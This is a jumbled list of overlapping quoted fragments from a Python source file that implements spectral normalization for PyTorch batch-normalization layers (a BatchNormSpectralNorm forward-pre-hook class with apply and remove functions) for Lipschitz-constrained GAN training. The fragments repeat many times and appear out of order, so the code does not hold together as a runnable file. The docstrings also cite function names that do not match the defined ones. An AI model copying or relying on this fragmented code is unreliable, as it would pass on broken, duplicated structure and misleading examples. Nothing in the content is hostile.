"m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module,",
"of # things may assume that it exists, e.g., when initializing weights. #",
"\"\"\" Spectral Normalization borrowed from https://arxiv.org/abs/1802.05957 SN for batch normalization layers to be",
"eps (float, optional): epsilon for numerical stability in calculating norms Returns: The original",
"def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a parameter in the",
"parameter in the given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &=",
"in Generaive Adversarial Networks (GANs) by rescaling the weight tensor with spectral norm",
"self.sigma = sigma self.eps = eps def compute_weight(self, module): weight = getattr(module, self.name",
"m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items(): if",
"return weight, bias def remove(self, module): weight = getattr(module, self.name) bias = getattr(module,",
"for Generative Adversarial Networks`_ . .. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957",
"power iteration method to get spectral norm. This is implemented via a hook",
"in calculating norms Returns: The original module with the spectal norm hook Example::",
"Normalization for Generative Adversarial Networks`_ . .. _`Spectral Normalization for Generative Adversarial Networks`:",
"getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var)))",
"module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies",
"\"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()),",
"module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return module",
"(str, optional): name of weight parameter eps (float, optional): epsilon for numerical stability",
"is implemented via a hook that calculates spectral norm and rescales weight before",
"weight = weight / cur_sigma bias = bias / cur_sigma return weight, bias",
"delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight,",
"sigma self.eps = eps def compute_weight(self, module): weight = getattr(module, self.name + '_orig')",
"= self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias) else: weight_r_g = getattr(module, self.name",
"BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\")",
"eps=1e-12): r\"\"\"Applies spectral normalization to a parameter in the given module. .. math::",
"name self.sigma = sigma self.eps = eps def compute_weight(self, module): weight = getattr(module,",
"Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name (str, optional): name",
"iteration method. If the dimension of the weight tensor is greater than 2,",
"in the state dict # and also supports nn.init due to shared storage.",
"for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name (str, optional):",
"torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight /",
"__call__(self, module, inputs): if module.training: weight, bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module,",
"\"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training:",
"gets added as a parameter. Instead, we register weight.data as a # buffer,",
"def remove(self, module): weight = getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module, self.name)",
"tensor with spectral norm :math:`\\sigma` of the weight matrix calculated using power iteration",
"weight = getattr(module, self.name + '_orig') bias = getattr(module, \"bias_orig\") running_var = getattr(module,",
"module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}' not found in {}\".format( name, module))",
"# However, we can't directly assign as it could be an nn.Parameter and",
"We still need to assign weight back as fn.name because all sorts of",
"with the spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1,",
"`Spectral Normalization for Generative Adversarial Networks`_ . .. _`Spectral Normalization for Generative Adversarial",
"that calculates spectral norm and rescales weight before every :meth:`~Module.forward` call. See `Spectral",
"eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization reparameterization from a",
"def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization reparameterization from a module. Args: module",
"calculating norms Returns: The original module with the spectal norm hook Example:: >>>",
"bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma,",
"exists, e.g., when initializing weights. # However, we can't directly assign as it",
"math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2}",
"# things may assume that it exists, e.g., when initializing weights. # However,",
"torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name",
"if isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return module raise",
"delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if",
"getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module,",
"+ '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module,",
"in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return",
"in the given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}:",
"which will cause weight to be included in the state dict # and",
"may assume that it exists, e.g., when initializing weights. # However, we can't",
"module name (str, optional): name of weight parameter Example: >>> m = spectral_norm(nn.Linear(40,",
"= sigma self.eps = eps def compute_weight(self, module): weight = getattr(module, self.name +",
"self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self,",
"\"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We still need to assign weight back as",
"\"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We still need to assign",
"supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn",
"parameter eps (float, optional): epsilon for numerical stability in calculating norms Returns: The",
"self.name + '_orig') bias = getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad():",
"spectral norm. This is implemented via a hook that calculates spectral norm and",
"affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def",
"a # buffer, which will cause weight to be included in the state",
"delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We still need to",
"module.training: weight, bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias) else: weight_r_g",
"= torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight",
"optional): name of weight parameter eps (float, optional): epsilon for numerical stability in",
"in power iteration method to get spectral norm. This is implemented via a",
"/ torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight",
"Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name (str,",
"to get spectral norm. This is implemented via a hook that calculates spectral",
"getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name,",
"\\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of discriminators (critics) in Generaive Adversarial Networks",
"# gets added as a parameter. Instead, we register weight.data as a #",
"rescales weight before every :meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial Networks`_",
"https://arxiv.org/abs/1802.05957 SN for batch normalization layers to be of Lipschtz constant sigma (default=1.0).",
"bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to",
"2, it is reshaped to 2D in power iteration method to get spectral",
">>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items():",
"rescaling the weight tensor with spectral norm :math:`\\sigma` of the weight matrix calculated",
"remove_spectral_norm(m) \"\"\" for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name ==",
"the training of discriminators (critics) in Generaive Adversarial Networks (GANs) by rescaling the",
"'_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs):",
"method to get spectral norm. This is implemented via a hook that calculates",
"= eps def compute_weight(self, module): weight = getattr(module, self.name + '_orig') bias =",
"spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)",
"delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\",",
"'_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name,",
"getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma =",
"track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module,",
"weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k,",
"fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We still need",
"SN for batch normalization layers to be of Lipschtz constant sigma (default=1.0). \"\"\"",
"dimension of the weight tensor is greater than 2, it is reshaped to",
"remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization reparameterization from a module. Args: module (nn.Module):",
"added as a parameter. Instead, we register weight.data as a # buffer, which",
"from a module. Args: module (nn.Module): containing module name (str, optional): name of",
"= getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight /",
"weight, bias def remove(self, module): weight = getattr(module, self.name) bias = getattr(module, \"bias\")",
"However, we can't directly assign as it could be an nn.Parameter and #",
"&= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization",
"Args: module (nn.Module): containing module name (str, optional): name of weight parameter Example:",
"power iteration method. If the dimension of the weight tensor is greater than",
"as it could be an nn.Parameter and # gets added as a parameter.",
"eps) weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name +",
"module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We",
"with spectral norm :math:`\\sigma` of the weight matrix calculated using power iteration method.",
"module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization",
"module): weight = getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name",
"= name self.sigma = sigma self.eps = eps def compute_weight(self, module): weight =",
"norm. This is implemented via a hook that calculates spectral norm and rescales",
"\\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of discriminators (critics)",
"for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module)",
"layers to be of Lipschtz constant sigma (default=1.0). \"\"\" import torch from torch.nn.parameter",
"torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name",
"nn.Parameter and # gets added as a parameter. Instead, we register weight.data as",
"= getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\")",
"def __call__(self, module, inputs): if module.training: weight, bias = self.compute_weight(module) setattr(module, self.name, weight)",
"(float, optional): epsilon for numerical stability in calculating norms Returns: The original module",
"bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias)",
"module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes the spectral normalization reparameterization from a module. Args:",
"\"bias\", bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad",
"name (str, optional): name of weight parameter eps (float, optional): epsilon for numerical",
"max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight / cur_sigma bias = bias /",
"normalization layers to be of Lipschtz constant sigma (default=1.0). \"\"\" import torch from",
"call. See `Spectral Normalization for Generative Adversarial Networks`_ . .. _`Spectral Normalization for",
"eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module,",
"stabilizes the training of discriminators (critics) in Generaive Adversarial Networks (GANs) by rescaling",
"could be an nn.Parameter and # gets added as a parameter. Instead, we",
"self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def",
"(nn.Module): containing module name (str, optional): name of weight parameter Example: >>> m",
"module (nn.Module): containing module name (str, optional): name of weight parameter Example: >>>",
"self.name, weight) setattr(module, \"bias\", bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g",
"momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module",
"is greater than 2, it is reshaped to 2D in power iteration method",
"= module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) #",
"\"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight, bias",
"getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps): fn",
"module): weight = getattr(module, self.name + '_orig') bias = getattr(module, \"bias_orig\") running_var =",
"storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12):",
"name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a parameter in the given module.",
"weight = getattr(module, self.name) bias = getattr(module, \"bias\") delattr(module, self.name) delattr(module, self.name +",
"\\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes",
"== name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError(\"spectral_norm of '{}' not found",
"bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral normalization to a parameter in the given",
"things may assume that it exists, e.g., when initializing weights. # However, we",
"name='weight'): r\"\"\"Removes the spectral normalization reparameterization from a module. Args: module (nn.Module): containing",
"will cause weight to be included in the state dict # and also",
"due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module,",
"apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias",
"getattr(module, self.name + '_orig') bias = getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with",
"Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k, hook in",
"\\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the",
"+ '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module,",
"self.name) delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach()))",
"the spectral normalization reparameterization from a module. Args: module (nn.Module): containing module name",
"Returns: The original module with the spectal norm hook Example:: >>> m =",
"sigma, eps) weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name) delattr(module, \"bias\") module.register_parameter(fn.name",
"bias) # We still need to assign weight back as fn.name because all",
"\\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of discriminators (critics) in",
"<reponame>sebemery/Lipschitz-constrained-neural-networks \"\"\" Spectral Normalization borrowed from https://arxiv.org/abs/1802.05957 SN for batch normalization layers to",
"reshaped to 2D in power iteration method to get spectral norm. This is",
"self.compute_weight(module) setattr(module, self.name, weight) setattr(module, \"bias\", bias) else: weight_r_g = getattr(module, self.name +",
"= weight / cur_sigma bias = bias / cur_sigma return weight, bias def",
"self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma,",
"(default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight',",
"register weight.data as a # buffer, which will cause weight to be included",
"(critics) in Generaive Adversarial Networks (GANs) by rescaling the weight tensor with spectral",
"the given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h}",
"module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight, bias =",
"module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight, bias = self.compute_weight(module) setattr(module,",
"print(cur_sigma) weight = weight / cur_sigma bias = bias / cur_sigma return weight,",
"a parameter. Instead, we register weight.data as a # buffer, which will cause",
"module with the spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05,",
"bias = getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight",
"back as fn.name because all sorts of # things may assume that it",
"iteration method to get spectral norm. This is implemented via a hook that",
"compute_weight(self, module): weight = getattr(module, self.name + '_orig') bias = getattr(module, \"bias_orig\") running_var",
"m.weight_orig.size() torch.Size([10]) \"\"\" BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r\"\"\"Removes",
"delattr(module, self.name + '_orig') delattr(module, \"bias\") delattr(module, \"bias_orig\") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter(\"bias\", torch.nn.Parameter(bias.detach())) def",
"also supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return",
"\\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training",
"state dict # and also supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data)",
"nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def",
"= getattr(module, self.name + '_orig') bias = getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\")",
"as a # buffer, which will cause weight to be included in the",
"calculated using power iteration method. If the dimension of the weight tensor is",
"e.g., when initializing weights. # However, we can't directly assign as it could",
"torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) #",
"name of weight parameter eps (float, optional): epsilon for numerical stability in calculating",
"def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma self.eps =",
"tensor is greater than 2, it is reshaped to 2D in power iteration",
"\"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) #",
"spectral normalization to a parameter in the given module. .. math:: \\mathbf{W} &=",
"# print(cur_sigma) weight = weight / cur_sigma bias = bias / cur_sigma return",
"BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma self.eps",
"given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne",
"# We still need to assign weight back as fn.name because all sorts",
"and rescales weight before every :meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial",
"Adversarial Networks (GANs) by rescaling the weight tensor with spectral norm :math:`\\sigma` of",
"of discriminators (critics) in Generaive Adversarial Networks (GANs) by rescaling the weight tensor",
"+ '_orig') bias = getattr(module, \"bias_orig\") running_var = getattr(module, \"running_var\") with torch.no_grad(): cur_sigma",
"hook that calculates spectral norm and rescales weight before every :meth:`~Module.forward` call. See",
"it could be an nn.Parameter and # gets added as a parameter. Instead,",
"def compute_weight(self, module): weight = getattr(module, self.name + '_orig') bias = getattr(module, \"bias_orig\")",
"module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W}) &= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0}",
"calculates spectral norm and rescales weight before every :meth:`~Module.forward` call. See `Spectral Normalization",
"with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma)",
"getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps)",
"be of Lipschtz constant sigma (default=1.0). \"\"\" import torch from torch.nn.parameter import Parameter",
"See `Spectral Normalization for Generative Adversarial Networks`_ . .. _`Spectral Normalization for Generative",
"the spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True,",
"spectral normalization reparameterization from a module. Args: module (nn.Module): containing module name (str,",
"module.register_parameter(fn.name + \"_orig\", weight) module.register_parameter(\"bias_orig\", bias) # We still need to assign weight",
"a parameter in the given module. .. math:: \\mathbf{W} &= \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\ \\sigma(\\mathbf{W})",
"weight tensor is greater than 2, it is reshaped to 2D in power",
"getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod",
"0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of discriminators (critics) in Generaive",
"to be included in the state dict # and also supports nn.init due",
"class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma",
"&= \\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of",
"parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) \"\"\" for k, hook",
"\\max_{\\mathbf{h}: \\mathbf{h} \\ne 0} \\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of discriminators",
"\"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps): fn =",
"to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight',",
"weights. # However, we can't directly assign as it could be an nn.Parameter",
"bias = bias / cur_sigma return weight, bias def remove(self, module): weight =",
"@staticmethod def apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight =",
"weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r\"\"\"Applies spectral",
"module.register_parameter(\"bias_orig\", bias) # We still need to assign weight back as fn.name because",
"the weight tensor is greater than 2, it is reshaped to 2D in",
"Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name (str, optional): name of",
"included in the state dict # and also supports nn.init due to shared",
"\\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2} Spectral normalization stabilizes the training of discriminators (critics) in Generaive Adversarial",
"training of discriminators (critics) in Generaive Adversarial Networks (GANs) by rescaling the weight",
"sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias = module._parameters[\"bias\"]",
"= getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, \"bias_orig\").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, \"bias\").detach_().requires_grad_(bias_r_g)",
"weight / cur_sigma bias = bias / cur_sigma return weight, bias def remove(self,",
"the state dict # and also supports nn.init due to shared storage. module.register_buffer(fn.name,",
"fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias = module._parameters[\"bias\"] delattr(module, fn.name)",
"containing module name (str, optional): name of weight parameter eps (float, optional): epsilon",
"module name (str, optional): name of weight parameter eps (float, optional): epsilon for",
"Normalization borrowed from https://arxiv.org/abs/1802.05957 SN for batch normalization layers to be of Lipschtz",
"for batch normalization layers to be of Lipschtz constant sigma (default=1.0). \"\"\" import",
"normalization reparameterization from a module. Args: module (nn.Module): containing module name (str, optional):",
"shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer(\"bias\", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0,",
"# buffer, which will cause weight to be included in the state dict",
"sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma self.eps = eps def compute_weight(self,",
"than 2, it is reshaped to 2D in power iteration method to get",
"directly assign as it could be an nn.Parameter and # gets added as",
"https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name (str, optional): name of weight parameter",
"cur_sigma bias = bias / cur_sigma return weight, bias def remove(self, module): weight",
